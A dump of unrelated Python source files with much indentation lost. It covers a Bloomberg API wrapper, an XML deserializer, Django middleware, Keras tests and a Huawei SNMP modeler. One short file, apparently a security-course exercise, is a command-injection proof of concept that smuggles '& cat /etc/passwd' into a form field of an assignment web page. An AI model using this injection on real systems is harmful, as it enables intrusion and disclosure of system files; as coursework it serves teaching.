enddate=datetime.date(2014, 1, 9), adjustmentSplit=False, periodicity='DAILY'):
request = self.refDataSvc.createRequest('HistoricalDataRequest')
request.append('securities', strSecurity)
if type(strData) == str:
strData = [strData]
for strD in strData:
request.append('fields', strD)
request.set('startDate', startdate.strftime('%Y%m%d'))
request.set('endDate', enddate.strftime('%Y%m%d'))
request.set('adjustmentSplit', 'TRUE' if adjustmentSplit else 'FALSE')
request.set('periodicitySelection', periodicity)
requestID = self.session.sendRequest(request)
while True:
event = self.session.nextEvent()
if event.eventType() == blpapi.event.Event.RESPONSE:
break
fieldDataArray = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).getElement(FIELD_DATA)
fieldDataList = [fieldDataArray.getValueAsElement(i) for i in range(0, fieldDataArray.numValues())]
outDates = [x.getElementAsDatetime(DATE) for x in fieldDataList]
output = pandas.DataFrame(index=outDates, columns=strData)
for strD in strData:
output[strD] = [x.getElementAsFloat(strD) for x in fieldDataList]
output.replace('#N/A History', pandas.np.nan, inplace=True)
output.index = pandas.to_datetime(output.index)
return output
    def bdhOHLC(self, strSecurity='SPX Index', startdate=datetime.date(2014, 1, 1), enddate=datetime.date(2014, 1, 9),
                periodicity='DAILY'):
        # Pass periodicity by keyword so it is not swallowed by bdh's adjustmentSplit argument
        return self.bdh(strSecurity, ['PX_OPEN', 'PX_HIGH', 'PX_LOW', 'PX_LAST'], startdate, enddate,
                        periodicity=periodicity)
def closeSession(self):
self.session.stop()
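# Usage sketch for BLP (requires a running Bloomberg terminal session):
#
#   blp = BLP()
#   px = blp.bdp('SPX Index', 'PX_LAST')
#   hist = blp.bdh('SPX Index', 'PX_LAST', datetime.date(2014, 1, 1), datetime.date(2014, 1, 9))
#   blp.closeSession()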
################################################
class BLPTS():
"""Thread-safe implementation of the Request/Response Paradigm.
The functions don't return anything but notify observers of results.
Including startDate as a keyword argument will define a HistoricalDataRequest, otherwise it will be a ReferenceDataRequest.
HistoricalDataRequest sends observers a pandas DataFrame, whereas ReferenceDataRequest sends a pandas Series.
Override seems to only work when there's one security, one field, and one override.
Examples:
BLPTS(['ESA Index', 'VGA Index'], ['BID', 'ASK'])
BLPTS('US900123AL40 Govt','YLD_YTM_BID',strOverrideField='PX_BID',strOverrideValue='200')
BLPTS(['SPX Index','SX5E Index','EUR Curncy'],['PX_LAST','VOLUME'],startDate=datetime.datetime(2014,1,1),endDate=datetime.datetime(2015,5,14),periodicity='DAILY')
"""
def __init__(self, securities=[], fields=[], **kwargs):
"""
Keyword arguments:
securities : list of ISINS
fields : list of fields
kwargs : startDate and endDate (datetime.datetime object, note: hours, minutes, seconds, and microseconds must be replaced by 0)
"""
self.session = blpapi.Session()
self.session.start()
self.session.openService('//BLP/refdata')
self.refDataSvc = self.session.getService('//BLP/refdata')
self.observers = []
self.kwargs = kwargs
if len(securities) > 0 and len(fields) > 0:
# also works if securities and fields are a string
self.fillRequest(securities, fields, **kwargs)
def fillRequest(self, securities, fields, **kwargs):
"""
keyword arguments:
securities : list of ISINS
fields : list of fields
kwargs : startDate and endDate (datetime.datetime object, note: hours, minutes, seconds, and microseconds must be replaced by 0)
"""
self.kwargs = kwargs
if type(securities) == str:
securities = [securities]
if type(fields) == str:
fields = [fields]
if 'startDate' in kwargs:
self.request = self.refDataSvc.createRequest('HistoricalDataRequest')
self.startDate = kwargs['startDate']
self.endDate = kwargs['endDate']
if 'periodicity' in kwargs:
self.periodicity = kwargs['periodicity']
else:
self.periodicity = 'DAILY'
self.request.set('startDate', self.startDate.strftime('%Y%m%d'))
self.request.set('endDate', self.endDate.strftime('%Y%m%d'))
self.request.set('periodicitySelection', self.periodicity)
else:
self.request = self.refDataSvc.createRequest('ReferenceDataRequest')
self.output = pandas.DataFrame(index=securities, columns=fields)
if 'strOverrideField' in kwargs:
o = self.request.getElement('overrides').appendElement()
o.setElement('fieldId', kwargs['strOverrideField'])
o.setElement('value', kwargs['strOverrideValue'])
self.securities = securities
self.fields = fields
for s in securities:
self.request.append('securities', s)
for f in fields:
self.request.append('fields', f)
def get(self, newSecurities=[], newFields=[], **kwargs):
"""
securities : list of ISINS
fields : list of fields
kwargs : startDate and endDate (datetime.datetime object, note: hours, minutes, seconds, and microseconds must be replaced by 0)
"""
if len(newSecurities) > 0 or len(newFields) > 0:
self.fillRequest(newSecurities, newFields, **kwargs)
self.requestID = self.session.sendRequest(self.request)
while True:
event = self.session.nextEvent()
if event.eventType() in [blpapi.event.Event.RESPONSE, blpapi.event.Event.PARTIAL_RESPONSE]:
responseSize = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).numValues()
for i in range(0, responseSize):
if 'startDate' in self.kwargs:
# HistoricalDataRequest
output = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA)
security = output.getElement(SECURITY).getValueAsString()
fieldDataArray = output.getElement(FIELD_DATA)
fieldDataList = [fieldDataArray.getValueAsElement(i) for i in
range(0, fieldDataArray.numValues())]
dates = map(lambda x: x.getElement(DATE).getValueAsString(), fieldDataList)
outDF = pandas.DataFrame(index=dates, columns=self.fields)
outDF.index = pandas.to_datetime(outDF.index)
for field in self.fields:
data = []
for row in fieldDataList:
if row.hasElement(field):
data.append(row.getElement(field).getValueAsFloat())
else:
data.append(pandas.np.nan)
outDF[field] = data
self.updateObservers(security=security, field=field,
data=outDF) # update one security one field
self.updateObservers(security=security, field='ALL',
data=outDF) # update one security all fields
else:
# ReferenceDataRequest
output = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).getValueAsElement(
i)
n_elmts = output.getElement(FIELD_DATA).numElements()
security = output.getElement(SECURITY).getValueAsString()
for j in range(0, n_elmts):
data = output.getElement(FIELD_DATA).getElement(j)
field = str(data.name())
outData = _dict_from_element(data)
self.updateObservers(security=security, field=field,
data=outData) # update one security one field
self.output.loc[security, field] = outData
if n_elmts > 0:
self.updateObservers(security=security, field='ALL',
data=self.output.loc[security]) # update one security all fields
else:
print('Empty response received for ' + security)
if event.eventType() == blpapi.event.Event.RESPONSE:
break
def register(self, observer):
if not observer in self.observers:
self.observers.append(observer)
def unregister(self, observer):
if observer in self.observers:
self.observers.remove(observer)
def unregisterAll(self):
if self.observers:
del self.observers[:]
def updateObservers(self, *args, **kwargs):
for observer in self.observers:
observer.update(*args, **kwargs)
def closeSession(self):
self.session.stop()
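# Usage sketch for BLPTS with the HistoryWatcher observer defined below:
#
#   req = BLPTS(['SPX Index'], ['PX_LAST'],
#               startDate=datetime.datetime(2014, 1, 1),
#               endDate=datetime.datetime(2014, 1, 9))
#   watcher = HistoryWatcher()
#   req.register(watcher)
#   req.get()
#   req.closeSession()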
################################################
class BLPStream(threading.Thread):
"""The Subscription Paradigm
The subscribed data will be sitting in self.output and update automatically. Observers will be notified.
    floatInterval is the minimum amount of time, in seconds, between updates; it sometimes needs to be set to 0 for things to work properly.
intCorrID is a user defined ID for the request
It is sometimes safer to ask for each data (for instance BID and ASK) in a separate stream.
Note that for corporate bonds, a change in the ASK price will still trigger a BID event.
"""
def __init__(self, strSecurityList=['ESM5 Index', 'VGM5 Index'], strDataList=['BID', 'ASK'], floatInterval=0,
intCorrIDList=[0, 1]):
threading.Thread.__init__(self)
self.session = blpapi.Session()
self.session.start()
self.session.openService("//BLP/mktdata")
if type(strSecurityList) == str:
strSecurityList = [strSecurityList]
if type(intCorrIDList) == int:
intCorrIDList = [intCorrIDList]
if type(strDataList) == str:
strDataList = [strDataList]
self.strSecurityList = strSecurityList
self.strDataList = strDataList
if len(strSecurityList) != len(intCorrIDList):
print('Number of securities needs to match number of Correlation IDs, overwriting IDs')
self.intCorrIDList = range(0, len(strSecurityList))
else:
self.intCorrIDList = intCorrIDList
self.subscriptionList = blpapi.subscriptionlist.SubscriptionList()
for (security, intCorrID) in zip(self.strSecurityList, self.intCorrIDList):
self.subscriptionList.add(security, self.strDataList, "interval=" + str(floatInterval),
blpapi.CorrelationId(intCorrID))
self.output = pandas.DataFrame(index=self.strSecurityList, columns=self.strDataList)
self.dictCorrID = dict(zip(self.intCorrIDList, self.strSecurityList))
self.lastUpdateTimeBlmbrg = '' # Warning - if you mix live_stream and delayed data you could have non increasing data
self.lastUpdateTime = datetime.datetime(1900, 1, 1)
self.observers = []
def register(self, observer):
if observer not in self.observers:
self.observers.append(observer)
def unregister(self, observer):
if observer in self.observers:
self.observers.remove(observer)
def unregisterAll(self):
if self.observers:
del self.observers[:]
def updateObservers(self, *args, **kwargs):
for observer in self.observers:
observer.update(*args, **kwargs)
def run(self, verbose=False):
self.session.subscribe(self.subscriptionList)
while True:
event = self.session.nextEvent()
if event.eventType() == blpapi.event.Event.SUBSCRIPTION_DATA:
self.handleDataEvent(event)
else:
if verbose:
self.handleOtherEvent(event)
def handleDataEvent(self, event):
output = blpapi.event.MessageIterator(event).next()
self.lastUpdateTime = datetime.datetime.now()
corrID = output.correlationIds()[0].value()
security = self.dictCorrID[corrID]
isParsed = False
# print(output.toString())
if output.hasElement(EVENT_TIME):
self.lastUpdateTimeBlmbrg = output.getElement(EVENT_TIME).toString()
for field in self.strDataList:
if output.hasElement(field):
isParsed = True
try:
data = output.getElement(field).getValueAsFloat()
except Exception:
data = pandas.np.nan
# getValueAsString() can still fail here if the field is present but empty
print('error: ', security, field)
self.output.loc[security, field] = data
self.updateObservers(time=self.lastUpdateTime, security=security, field=field, corrID=corrID, data=data,
bbgTime=self.lastUpdateTimeBlmbrg)
# It can happen that you get an event without the data behind the event!
self.updateObservers(time=self.lastUpdateTime, security=security, field='ALL', corrID=corrID, data=0,
bbgTime=self.lastUpdateTimeBlmbrg)
# if not isParsed:
# print(output.toString())
def handleOtherEvent(self, event):
output = blpapi.event.MessageIterator(event).next()
msg = output.toString()
if event.eventType() == blpapi.event.Event.AUTHORIZATION_STATUS:
print("Authorization event: " + msg)
elif event.eventType() == blpapi.event.Event.SUBSCRIPTION_STATUS:
print("Subscription status event: " + msg)
else:
print("Other event: event " + str(event.eventType()))
def closeSubscription(self):
self.session.unsubscribe(self.subscriptionList)
################################################
# Convenience functions below####################
################################################
def _dict_from_element(element):
'''
Used for e.g. dividends
'''
try:
return element.getValueAsString()
except Exception:
if element.numValues() > 1:
results = []
for i in range(0, element.numValues()):
subelement = element.getValue(i)
results.append(_dict_from_element(subelement))
else:
results = {}
for j in range(0, element.numElements()):
subelement = element.getElement(j)
name = str(subelement.name())
results[name] = _dict_from_element(subelement)
return results
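# A sketch of the shapes _dict_from_element can return (illustrative field):
# a scalar element comes back as a string, while a bulk field such as
# DVD_HIST_ALL would come back as a list of dicts, e.g.
# [{'Declared Date': '2015-01-01', 'Dividend Amount': '0.52', ...}, ...],
# depending on how Bloomberg structures that particular field.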
class Observer(object):
__metaclass__ = ABCMeta
@abstractmethod
def update(self, *args, **kwargs):
pass
class HistoryWatcher(Observer):
"""Object to stream and record history data from Bloomberg.
"""
def __init__(self):
self.outputDC = {}
def update(self, *args, **kwargs):
if kwargs['field'] != 'ALL':
self.outputDC[(kwargs['security'], kwargs['field'])] = kwargs['data'][
[kwargs['field']]] # double brackets keep it a dataframe, not a series
def simpleReferenceDataRequest(id_to_ticker_dic, fields):
'''
Common use case for reference data request
id_to_ticker_dic: dictionary mapping a user id to a Bloomberg security ticker, e.g. {'Apple': 'AAPL US Equity'}
Returns a dataframe indexed by the user id, with columns equal to fields
'''
ticker_to_id_dic = {v: k for k, v in id_to_ticker_dic.items()}
blpts = BLPTS(id_to_ticker_dic.values(), fields)
blpts.get()
blpts.closeSession()
blpts.output['id'] = blpts.output.index
blpts.output['id'].replace(ticker_to_id_dic, inplace=True)
blpts.output.set_index('id', inplace=True)
return blpts.output.copy()
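# A minimal usage sketch (assumes a live Bloomberg session and that the
# tickers below resolve; field names are illustrative):
#   df = simpleReferenceDataRequest({'Apple': 'AAPL US Equity',
#                                    'Microsoft': 'MSFT US Equity'},
#                                   ['PX_LAST', 'CRNCY'])
#   print(df.loc['Apple', 'PX_LAST'])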
def simpleHistoryRequest(securities=[], fields=[], startDate=datetime.datetime(2015, 1, 1),
endDate=datetime.datetime(2016, 1, 1), periodicity='DAILY'):
'''
Convenience function to retrieve historical data for a list of securities and fields
As returned series can have different lengths, missing data is filled with pandas.np.nan (this is already handled within a single security across several fields).
If multiple securities and fields, a MultiIndex dataframe will be returned.
'''
blpts = BLPTS(securities, fields, startDate=startDate, endDate=endDate, periodicity=periodicity)
historyWatcher = HistoryWatcher()
blpts.register(historyWatcher)
blpts.get()
blpts.closeSession()
for key, df in historyWatcher.outputDC.items():
df.columns = [key]
output = pandas.concat(historyWatcher.outputDC.values(), axis=1)
output.columns = pandas.MultiIndex.from_tuples(output.columns)
output.columns.names = ['Security', 'Field']
return output
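# A minimal usage sketch (illustrative tickers, fields and dates; requires a
# running Bloomberg terminal):
#   hist = simpleHistoryRequest(['AAPL US Equity', 'MSFT US Equity'],
#                               ['PX_LAST'],
#                               startDate=datetime.datetime(2015, 1, 1),
#                               endDate=datetime.datetime(2015, 6, 30))
#   print(hist[('AAPL US Equity', 'PX_LAST')].tail())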
################################################
# Examples below#################################
################################################
def excelEmulationExample():
##Examples of the Request/Response Paradigm
bloomberg = BLP()
print(bloomberg.bdp())
print('')
print(bloomberg.bdp('US900123AL40 Govt', 'YLD_YTM_BID', 'PX_BID', '200'))
print('')
print(bloomberg.bdh())
print('')
print(bloomberg.bdhOHLC())
bloomberg.closeSession()
class ObserverStreamExample(Observer):
def update(self, *args, **kwargs):
output = kwargs['time'].strftime("%Y-%m-%d %H:%M:%S") + ' received ' + kwargs['security'] + ' ' + kwargs[
'field'] + '=' + str(kwargs['data'])
output = output + '. CorrID ' + str(kwargs['corrID']) + ' bbgTime ' + kwargs['bbgTime']
print(output)
def streamPatternExample():
stream = BLPStream('ESZ7 Index', ['BID', 'ASK'], 0, 1)
# stream=BLPStream('XS1151974877 CORP',['BID','ASK'],0,1) #Note that for a bond only BID gets updated even if ASK moves.
obs = ObserverStreamExample()
stream.register(obs)
stream.start()
class ObserverRequestExample(Observer):
def update(self, *args, **kwargs):
if kwargs['field'] == 'ALL':
print(kwargs['security'])
print(kwargs['data'])
def BLPTSExample():
result = BLPTS(['XS0316524130 Corp', 'US900123CG37 Corp'], ['PX_BID', 'INT_ACC', 'DAYS_TO_NEXT_COUPON'])
result.get()
print(result.output)
result.closeSession()
#############################################################################
def main():
BLPTSExample()
if __name__ == '__main__':
BLPTSExample()
simpleHistoryRequest("AAPL")
|
ahwmrklas/warpWarp
|
refs/heads/master
|
test/XML2Py.py
|
1
|
'''
XML2Py - XML to Python de-serialization
This code transforms an XML document into a Python data structure
Usage:
deserializer = XML2Py()
python_object = deserializer.parse( xml_string )
print(xml_string)
print(python_object)
'''
from lxml import etree
class XML2Py():
def __init__( self ):
self._parser = etree.XMLParser( remove_blank_text=True )
self._root = None # root of etree structure
self.data = None # where we store the processed Python structure
def parse( self, xmlString ):
'''
processes XML string into Python data structure
'''
self._root = etree.fromstring( xmlString, self._parser )
self.data = self._parseXMLRoot()
return self.data
def tostring( self ):
'''
creates a string representation using our etree object
'''
if self._root is not None:
return etree.tostring( self._root )
def _parseXMLRoot( self ):
'''
starts processing, takes care of first-level idiosyncrasies
'''
childDict = self._parseXMLNode( self._root )
return { self._root.tag : childDict["children"] }
def _parseXMLNode( self, element ):
'''
rest of the processing
'''
childContainer = None # either Dict or List
# process any tag attributes
# if we have attributes then the child container is a Dict
# otherwise a List
if element.items():
childContainer = {}
childContainer.update( dict( element.items() ) )
else:
childContainer = []
if isinstance( childContainer, list ) and element.text:
# tag with no attributes and one that contains text
childContainer.append( element.text )
else:
# tag might have children, let's process them
for child_elem in element.getchildren():
childDict = self._parseXMLNode( child_elem )
# let's store our child based on container type
#
if isinstance( childContainer, dict ):
# these children are lone tag entities ( eg, 'copyright' )
childContainer.update( { childDict["tag"] : childDict["children"] } )
else:
# these children are repeated tag entities ( eg, 'format' )
childContainer.append( childDict["children"] )
return { "tag":element.tag, "children": childContainer }
def main():
xml_string = '''
<documents>
<document date="June 6, 2009" title="The Newness of Python" author="John Doe">
<copyright type="CC" url="http://www.creativecommons.org/" date="June 24, 2009" />
<text>Python is very nice. Very, very nice.</text>
<formats>
<format type="pdf">
<info uri="http://www.python.org/newness-of-python.pdf" pages="245" />
</format>
<format type="web">
<info uri="http://www.python.org/newness-of-python.html" />
</format>
</formats>
</document>
</documents>
'''
deserializer = XML2Py()
python_object = deserializer.parse( xml_string )
print(xml_string)
print(python_object)
if __name__ == '__main__':
main()
|
sleepers-anonymous/zscore
|
refs/heads/master
|
sleep/middleware.py
|
1
|
from django.utils import timezone
from models import SleeperProfile, Sleeper
import pytz
class TimezoneMiddleware(object):
def process_request(self,request):
if request.user.is_authenticated():
tz = pytz.timezone(request.user.sleeperprofile.timezone)
timezone.activate(tz)
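# To enable this middleware (a sketch; the exact settings module is
# project-specific), add it to MIDDLEWARE_CLASSES in settings.py:
#   MIDDLEWARE_CLASSES += ('sleep.middleware.TimezoneMiddleware',)
# so every authenticated request is rendered in the user's profile timezone.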
|
Cadene/keras
|
refs/heads/master
|
tests/auto/test_sequential_model.py
|
33
|
from __future__ import absolute_import
from __future__ import print_function
import unittest
import numpy as np
np.random.seed(1337)
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Merge
from keras.utils import np_utils
from keras.utils.test_utils import get_test_data
input_dim = 32
nb_hidden = 16
nb_class = 4
batch_size = 64
nb_epoch = 1
train_samples = 5000
test_samples = 1000
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples, nb_test=test_samples, input_shape=(input_dim,),
classification=True, nb_class=4)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
print(X_train.shape)
print(y_train.shape)
class TestSequential(unittest.TestCase):
def test_sequential(self):
print('Test sequential')
model = Sequential()
model.add(Dense(input_dim, nb_hidden))
model.add(Activation('relu'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=2, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=2, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=1, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, shuffle=False)
model.train_on_batch(X_train[:32], y_train[:32])
loss = model.evaluate(X_train, y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict(X_test, verbose=0)
classes = model.predict_classes(X_test, verbose=0)
probas = model.predict_proba(X_test, verbose=0)
print(model.get_config(verbose=1))
print('test weight saving')
model.save_weights('temp.h5', overwrite=True)
model = Sequential()
model.add(Dense(input_dim, nb_hidden))
model.add(Activation('relu'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.load_weights('temp.h5')
nloss = model.evaluate(X_train, y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_sum(self):
print('Test merge: sum')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0, shuffle=False)
loss = model.evaluate([X_train, X_train], y_train, verbose=0)
print('loss:', loss)
if loss > 0.7:
raise Exception('Score too low, learning issue.')
preds = model.predict([X_test, X_test], verbose=0)
classes = model.predict_classes([X_test, X_test], verbose=0)
probas = model.predict_proba([X_test, X_test], verbose=0)
print(model.get_config(verbose=1))
print('test weight saving')
model.save_weights('temp.h5', overwrite=True)
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.load_weights('temp.h5')
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
nloss = model.evaluate([X_train, X_train], y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_concat(self):
print('Test merge: concat')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='concat'))
model.add(Dense(nb_hidden * 2, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0, shuffle=False)
loss = model.evaluate([X_train, X_train], y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict([X_test, X_test], verbose=0)
classes = model.predict_classes([X_test, X_test], verbose=0)
probas = model.predict_proba([X_test, X_test], verbose=0)
print(model.get_config(verbose=1))
print('test weight saving')
model.save_weights('temp.h5', overwrite=True)
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='concat'))
model.add(Dense(nb_hidden * 2, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.load_weights('temp.h5')
nloss = model.evaluate([X_train, X_train], y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_recursivity(self):
print('Test merge recursivity')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
righter = Sequential()
righter.add(Dense(input_dim, nb_hidden))
righter.add(Activation('relu'))
intermediate = Sequential()
intermediate.add(Merge([left, right], mode='sum'))
intermediate.add(Dense(nb_hidden, nb_hidden))
intermediate.add(Activation('relu'))
model = Sequential()
model.add(Merge([intermediate, righter], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_data=([X_test, X_test, X_test], y_test))
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_data=([X_test, X_test, X_test], y_test))
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_split=0.1)
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_split=0.1)
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0, shuffle=False)
loss = model.evaluate([X_train, X_train, X_train], y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict([X_test, X_test, X_test], verbose=0)
classes = model.predict_classes([X_test, X_test, X_test], verbose=0)
probas = model.predict_proba([X_test, X_test, X_test], verbose=0)
print(model.get_config(verbose=1))
model.save_weights('temp.h5', overwrite=True)
model.load_weights('temp.h5')
nloss = model.evaluate([X_train, X_train, X_train], y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_overlap(self):
print('Test merge overlap')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, left], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=2, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=2, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=1, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, shuffle=False)
model.train_on_batch(X_train[:32], y_train[:32])
loss = model.evaluate(X_train, y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict(X_test, verbose=0)
classes = model.predict_classes(X_test, verbose=0)
probas = model.predict_proba(X_test, verbose=0)
print(model.get_config(verbose=1))
model.save_weights('temp.h5', overwrite=True)
model.load_weights('temp.h5')
nloss = model.evaluate(X_train, y_train, verbose=0)
print(nloss)
assert(loss == nloss)
if __name__ == '__main__':
print('Test Sequential model')
unittest.main()
|
vhazali/cs5331
|
refs/heads/master
|
assignment2/scripts/exploit08/exploit08.py
|
1
|
import urllib, urllib2, webbrowser
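# Command-injection probe: the ip_url value smuggles '& cat /etc/passwd'
# into whatever shell command case08.php builds around it; the response is
# saved to results.html and opened in a browser for inspection.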
url = 'http://www.wsb.com/Assignment2/case08.php'
values = dict(ip_url = '& cat /etc/passwd')
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
rsp = urllib2.urlopen(req)
with open('results.html', 'w') as f:
f.write(rsp.read())
new = 2
webbrowser.open('results.html', new=new)
|
nclisg/ZenPacks.community.HuaweiWireless
|
refs/heads/master
|
ZenPacks/community/HuaweiWireless/modeler/plugins/community/snmp/HuaweiAccessControllerMap.py
|
2
|
from Products.DataCollector.plugins.CollectorPlugin import (SnmpPlugin, GetTableMap, GetMap)
from Products.DataCollector.plugins.DataMaps import ObjectMap, RelationshipMap, MultiArgs
#Lookup table for AP Status
STATUSNAME = {
1 : 'idle',
2 : 'autofind',
3 : 'typeNotMatch',
4 : 'fault',
5 : 'config',
6 : 'configFailed',
7 : 'download',
8 : 'normal',
9 : 'commiting',
10 : 'commitFailed',
11 : 'standby',
12 : 'vermismatch'
}
#Lookup table for AP Region Deploy modes
DEPLOYMODES = {
1 : 'Discrete',
2 : 'Normal',
3 : 'Dense'
}
class HuaweiAccessControllerMap(SnmpPlugin):
#Pull SNMP data from controllers
snmpGetTableMaps = (
GetTableMap(
'hwApRegionTable', '1.3.6.1.4.1.2011.6.139.2.5.1.1', {
'.2':'hwApRegionName',
'.3':'hwApRegionDeployMode',
'.4':'hwApRegionApNumber',
}
),
GetTableMap(
'hwApObjectsTable', '1.3.6.1.4.1.2011.6.139.2.6.1.1', {
'.2':'hwApUsedType',
'.4':'hwApUsedRegionIndex',
'.5':'hwApMac',
'.6':'hwApSn',
'.7':'hwApSysName',
'.8':'hwApRunState',
'.9':'hwApSoftwareVersion',
'.15':'hwApIpAddress',
'.20':'hwApRunTime',
}
),
GetTableMap(
'hwApLldpTable', '1.3.6.1.4.1.2011.6.139.2.6.14.1', {
'.6':'hwApLldpRemPortId',
'.8':'hwApLldpRemSysName',
}
)
)
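# Each GetTableMap pairs a base table OID with a {column-suffix: name} map;
# the '.N' keys are column sub-OIDs appended to the base OID, so e.g.
# hwApRegionName is collected from 1.3.6.1.4.1.2011.6.139.2.5.1.1.2.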
snmpGetMap = GetMap({
'.1.3.6.1.2.1.47.1.1.1.1.11.9':'entPhysicalSerialNum',
'.1.3.6.1.2.1.47.1.1.1.1.10.3':'entPhysicalSoftwareRev',
'.1.3.6.1.4.1.2011.6.139.1.2.5.0':'hwWlanAcAccessMaxApNumber',
})
def process(self, device, results, log):
log.info('processing %s for device %s', self.name(), device.id)
maps = []
regionmap = []
regionnames = []
